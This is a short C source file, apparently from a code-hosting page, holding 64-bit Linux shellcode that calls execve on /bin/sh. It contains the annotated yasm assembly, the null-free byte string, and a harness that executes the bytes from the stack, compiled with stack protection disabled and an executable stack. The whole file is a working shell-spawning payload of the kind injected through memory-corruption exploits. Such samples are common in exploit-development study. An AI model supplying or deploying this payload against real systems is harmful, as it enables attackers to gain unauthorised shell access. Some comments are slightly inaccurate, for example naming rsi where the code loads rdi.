31 lines
No EOL
1.3 KiB
C
31 lines
No EOL
1.3 KiB
C
/*
|
|
William Borskey 2015
|
|
Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64 bit Intel assembly using yasm.
|
|
|
|
1 ; int execve(const char *filename, char *const argv[], char *const envp[]);
|
|
2 BITS 64
|
|
3
|
|
4 section .text
|
|
5 global start
|
|
6
|
|
7 start:
|
|
8 mov rcx, 0x1168732f6e69622f ;move the immediate value /bin/sh in hex in
|
|
9 ;little endian byte order into rcx padded with 11
|
|
10 shl rcx, 0x08 ;left shift to trim off the two bytes of padding
|
|
11 shr rcx, 0x08 ;ringht shift to re order string
|
|
12 push rcx ;push the immediate value stored in rcx onto the stack
|
|
13 lea rdi, [rsp] ;load the address of the string that is on the stack into rsi
|
|
14 xor rdx, rdx ;zero out rdx for an execve argument
|
|
15 mov al, 0x3b ;move 0x3b (execve sycall) into al to avoid nulls
|
|
16 syscall ;make the syscall
|
|
*/
|
|
|
|
char shellcode[] = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05";
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
int (*func)();
|
|
func = (int (*)()) shellcode;
|
|
(int)(*func)();
|
|
return 0;
|
|
} |